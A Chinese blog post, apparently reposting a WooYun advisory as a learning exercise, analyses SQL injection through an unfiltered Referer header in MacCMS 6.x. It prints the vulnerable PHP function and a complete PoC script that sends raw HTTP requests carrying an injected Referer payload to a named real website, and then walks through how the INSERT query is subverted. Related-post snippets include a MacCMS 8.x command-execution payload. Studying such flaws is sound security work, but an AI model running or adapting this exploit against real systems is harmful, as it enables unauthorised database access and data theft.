学习 MacCMS 6.x referer处理不当引发注射

最新推荐文章于 2021-03-22 20:34:17 发布
最新推荐文章于 2021-03-22 20:34:17 发布
阅读量639 收藏
点赞数
分类专栏: Web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/airuozhaoyang/article/details/45100341
版权

from : http://www.wooyun.org/bugs/wooyun-2013-038804


code:

function Popularize()

{

	global $db;

	$userid = safeData("userid","get");

	if (!isNum($userid)) { die("用户非法,请从新登陆!");}

	$Ip = getip();

	$Ly = $_SERVER["HTTP_REFERER"];

	$row = $db->getRow("select * from tbl_user where u_id=" . $userid .""); 

	

	if ($row){

		$sql="Select * From tbl_user_visit where uv_userid = " .$userid." and uv_ip ='".$Ip."' and STR_TO_DATE(uv_time,'%Y-%m-%d')='".date("Y-m-d")."'";

		$rsUv = $db->query($sql);

		$nums= $db -> num_rows($rsUv);

		if ($nums==0){

			$db->query("insert tbl_user_visit (uv_userid,uv_ip,uv_ly,uv_time) values('".$userid."','".$Ip."','".$Ly."','".date('Y-m-d H:i:s',time())."') ");

			$db->query("update tbl_user set u_popularizenum=u_popularizenum+1,u_points=u_points+".app_userpopularize." where u_id = ". $userid );

			$sql="Delete From tbl_user_visit where STR_TO_DATE(uv_time,'%Y-%m-%d')<'".date("Y-m-d")."'";

			$db->query($sql);

		}

	}

	die("<sc" . "ript type=\"text/javascript\">location.href='" .getIndexLink() ."';</sc" . "ript>");

}

很好理解。$Ly = $_SERVER["HTTP_REFERER"]; 

referer没过滤。

导致注射。


看作者poc:

<?php

function uc_fopen($url, $limit = 0, $post = '', $cookie = '', $bysocket = FALSE, $ip = '', $timeout = 15, $block = TRUE,$inject) {

$return = '';

$matches = parse_url($url);

!isset($matches['host']) && $matches['host'] = '';

!isset($matches['path']) && $matches['path'] = '';

!isset($matches['query']) && $matches['query'] = '';

!isset($matches['port']) && $matches['port'] = '';

$host = $matches['host'];

$path = $matches['path'] ? $matches['path'].($matches['query'] ? '?'.$matches['query'] : '') : '/';

$port = !empty($matches['port']) ? $matches['port'] : 80;

if($post) {

   $out = "POST $path HTTP/1.0\r\n";

   $out .= "Accept: **\r\n";

   //$out .= "Referer: $boardurl\r\n";

   $out .= "Accept-Language: zh-cn\r\n";

   $out .= "User-Agent: $_SERVER[HTTP_USER_AGENT]\r\n";

   $out .= "Host: $host\r\n";

   $out .= "Connection: Close\r\n";

   $out .= "Cookie: $cookie\r\n\r\n";

}else {

   $out = "GET $path HTTP/1.0\r\n";

   $out .= "Accept: */*\r\n";

   $out .= "Referer: a',(select now()) and ".$inject.")#\r\n";

   $out .= "Accept-Language: zh-cn\r\n";

   $out .= "User-Agent: $_SERVER[HTTP_USER_AGENT]\r\n";

   $out .= "Host: $host\r\n";

   $out .= "Connection: Close\r\n";

   $out .= "Cookie: $cookie\r\n\r\n";

}



$fp = @fsockopen(($ip ? $ip : $host), $port, $errno, $errstr, $timeout);

if(!$fp) {

   return '';//note $errstr : $errno \r\n

} else {

   stream_set_blocking($fp, $block);

   stream_set_timeout($fp, $timeout);

   @fwrite($fp, $out);

   $status = stream_get_meta_data($fp);

   if(!$status['timed_out']) {

    while (!feof($fp)) {

     if(($header = @fgets($fp)) && ($header == "\r\n" || $header == "\n")) {

      break;

     }

    }



    $stop = false;

    while(!feof($fp) && !$stop) {

     $data = fread($fp, ($limit == 0 || $limit > 8192 ? 8192 : $limit));

     $return .= $data;

     if($limit) {

      $limit -= strlen($data);

      $stop = $limit <= 0;

     }

    }

   }

   @fclose($fp);

   return $return;

}

}



uc_fopen('http://www.391.net/user/service.php?action=popularize&userid=597',0,0,0,FALSE,'',15,true,$_GET["a"]);

echo 'hi';

?>

把这段php代码放到本地服务器上,先来看看代码干了什么。

因为是post方式,所以我们只看post分支。   首先构造了一个http包,然后用fsockopen发包。

看作者构造的referer:

 $out .= "Referer: a',(select now()) and ".$inject.")#\r\n";

$inject 传参是 $_GET["a"],我们假设$_GET["a"]是2 

所以实际的referer是:Referer: a',(select now()) and 2)#\r\n

带入到注入的句子中


发生注入的是这句:

$db->query("insert tbl_user_visit (uv_userid,uv_ip,uv_ly,uv_time) values('".$userid."','".$Ip."','".$Ly."','".date('Y-m-d H:i:s',time())."') ");

正常情况下 进入的sql语句为:

insert tbl_user_visit (uv_userid,uv_ip,uv_ly,uv_time) values('  1 ','0.0.0.0','a','2011-11-11 1:1:1')

注入后的句子为:

insert tbl_user_visit (uv_userid,uv_ip,uv_ly,uv_time) values('  1 ','0.0.0.0','a',(select now()) and 2)#\r\n','2011-11-11 1:1:1')

#屏蔽后面的sql,所以就是

insert tbl_user_visit (uv_userid,uv_ip,uv_ly,uv_time) values('  1 ','0.0.0.0','a',(select now()) and 2)

数字2 就是可注入部分。

作者将参数a挂在本地php后get注入。

最后得到信息。

对于insert注入得到信息。 此处需要继续学习一下。暂且挂了链接(http://drops.wooyun.org/tips/2078)

饿了 吃饭去。。





朝向高处的旅途
关注
专栏目录
Maccms8.x 命令执行漏洞分析
fly小灰灰的专栏
07-30 7140
1. 漏洞描述 漏洞简述: Maccms搜索页面搜索输入参数过滤不严谨导致前台命令执行可getshell 影响版本: Maccms8.x 2. 漏洞简介  魅魔电影程序(Maccms PHP)是一套采用PHP/MySQL数据库运行的全新且完善的强大视频电影系统。完美支持众多视频网站和高清播放器(youku,tudou,qvod,gvod等),完全免费开源。  该漏洞主要的产生原因是CMS搜索页面搜索
最新解密苹果MacCms播放器playerJS 去播放器广告 基于maccms8.x 2017.09.27
05-20
MacCms源文件里的player.js是加密的,加密的文件内置小广告比牛皮癣还多。 不但影响使用,且不方便修改,所以,有了解密文件,福音就来了。 下载后,在解密后的播放器文件里,自己把加密文件的外部链接换成自己的...
新版IPTV二开开源iptv管理系统源码对接EZtv电视直播管理系统.zip
06-19
新版骆驼IPTV小肥米二开开源iptv管理系统源码,对接EZtv电视直播管理系统。源码包含iptv后端源码和未加密的apk用于反编译,是可以运行的,那些说不能用的能不能找找自己的原因吧。 本版本支持:视频直播、本地播放、节目预告(EPG)、视频点播(对接影视资源站)、小窗口模式等功能。 需要注意的是管理后台的应用名和应用包名一定要和APK是一样的,否则会出现网络错误,当然造成网络错误还有其他很多原因。 APP反编译 需要用到: 安卓手机或安卓模拟器 MT管理器2 附件内未加固的apk安装包 视频教程在附件中,请下载查看。 网址替换搜索:http://iptv.aik.cool 需要修改4处 名称替换过滤:爱看直播 打赏图片LOGO图标替换路径:/res/drawable-hdpi-v4
php查询多id,PHP怎么同时查询多个ID?
weixin_33015139的博客
03-09 493
getrow($sql); $server=$db->getrow('select * from '.tname('server').' where CD_ID='.$row['CD_Server'].''); if($row){ $CD_Url=$row['CD_Url']; $play...
苹果cms伪静态常见几种问题解决教程
热门推荐
苹果cms10好看的模板
11-25 1万+
在设置苹果cms伪静态的过程中,由于网站环境,个人操作还有技术方面的认知程度不同难免会遇到各种疑惑和不解的问题。今天我们讲解下经常出现频率较高的几个问题的解决方法。如果你还没有开始设置伪静态请参考此文开始伪静态的设置:https://www.mytheme.cn/article/148.html 1,伪静态后除首页能显示其他页面全部404 大多数原因是伪静态规则不对,修改一下伪静态规则一般都可以...
苹果cms8.x 命令执行漏洞本地攻击演示
qq_42383069的博客
11-01 4677
新出道信息安全爱好者,有很多需要学习的地方,愿有一天能追上大佬步伐。 好了,下面进入正题,上半年6月份参加了铁人三项赛,线下web题为Maccms8.x ,当时也是通过团队协作以及百度资源成功破解服务器,现在我搭建了靶机,具体步骤写出来。 1.准备:phpstudy+Maccms8.x 源码 搭建成功后我们先来访问一下 因为Maccms8.x 存在命令执行漏洞,所以我们先点击searc...
Maccms8.x 命令执行分析
Matthew
05-24 6443
在很多地方看到有这个漏洞,自己学着分析一下。看到的poc如下 Url:  http://127.0.0.1/index.php?m=vod-search POST:  wd={{page:lang}if-:p{page:lang}hpinfo()}a{endif-}} 在index.php这里主要是进行模板的路由规则替换,vod-search就会拆分成vod和search,然后载入v
java 苹果cms 萌果_MacCMS8.x(苹果CMS8.x)整合Ckplayer6.4
weixin_39672680的博客
02-28 288
ckplayervar url = window.parent.frames.MacPlayer.PlayUrl;var h = window.parent.frames.MacPlayer.Height;var flashvars={f:url, //视频地址s:0, //播放模式c:0, //是否读取文本配置,0不是,1是p:1, ...
php api 实例maccms,api.php
weixin_35523135的博客
03-10 316
/*'软件名称:苹果CMS 官方网站:http://www.maccms.la/ 源码库:https://github.com/magicblack'--------------------------------------------------------'Licensed ( http://www.apache.org/licenses/LICENSE-2.0 )'遵循Apache2开...
Maccms8.x.zip
03-07
1. **强大的视频处理能力**:Maccms8.x支持多种视频格式,并且具备视频转码、压缩和分发的能力,确保用户能在不同设备上流畅观看。 2. **优化的搜索引擎**:内置智能搜索引擎,能快速定位用户感兴趣的视频,提高...
Maccms8.x整合Ckplayer6.4.rar
09-11
Maccms8.x与Ckplayer6.4的整合详解》 Maccms8.x是一款基于PHP开发的开源视频网站管理系统,它以其强大的视频管理功能和高效的运行效率,在众多内容管理系统中脱颖而出。Ckplayer则是一款知名的网页Flash视频...
苹果cms电影程序MacCms v8.x UTF8 bulid2016.11.30
12-03
苹果cms电影程序MacCms是一套采用ASP+MSSQL/ACCESS (PHP+MYSQL)... 经过近多年的开发经验和技术积累,苹果MacCMS视频电影程序已逐步走向成熟,在易用性和功能上已经成为同行中的佼佼者。 程序体积小-优化程序代码,运行
苹果cms电影程序MacCms v8.x UTF8 bulid2017.02.02
12-02
苹果cms电影程序MacCms是一套采用ASP+MSSQL/ACCESS (PHP+MYSQL)... 经过近多年的开发经验和技术积累,苹果MacCMS视频电影程序已逐步走向成熟,在易用性和功能上已经成为同行中的佼佼者。 程序体积小-优化程序代码,运行
admin maccj.php,maccms_php_7_7 苹
weixin_32323465的博客
03-22 225
inc/inc/ajax.phpinc/api.phpinc/cache.phpinc/class.phpinc/code.phpinc/config.phpinc/conn.phpinc/dim_menu.txtinc/dim_pse1.txtinc/dim_pse2.txtinc/dim_retype_art.txtinc/dim_retype_vod.txtinc/function.phpi...
访问网站目录 小知识
我多么希望明天有太阳,来灼烧我腐烂的梦想
12-02 3607
使用google  搜索 intext :"to parent directory  " 可以访问 网站目录。
对xdcms1.0的审计学习
我多么希望明天有太阳,来灼烧我腐烂的梦想
04-14 1330
学习文章:http://www.91ri.org/4285.html 1.cookie注入 \system\modules\member\index.php public function edit(){ $this->member_info(0); $gourl=$_GET['gourl']; $userid=$_COOKIE['member_userid'];
dvwa sql mysql5 注
我多么希望明天有太阳,来灼烧我腐烂的梦想
12-28 847
Mysql5内置的系统数据库IFORMATION_SCHEMA,其中记录了Mysql中所有 存在数据库名、数据库表、表字段。 重点要求研究几个对SQL注入有用的数据表说明:   //  英文版的单引号 从txt复制到word里面就会变成中文版的。。蛋疼。。注意。 1.得到所有数据库名: |SCHEMATA ->存储数据库名的表 |---字段:SCHEMA_NAME ->数据库名称
maccms 10 player.js解密
最新发布
10-07
maccms 10 player.js 是一个用于视频播放的javascript文件,解密它可能有以下几种方法。 首先,可以尝试查看该文件是否有相关的解密方法。有可能在该文件中有一些注释或者函数名字暗示了解密的方法。如果是这种情况...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值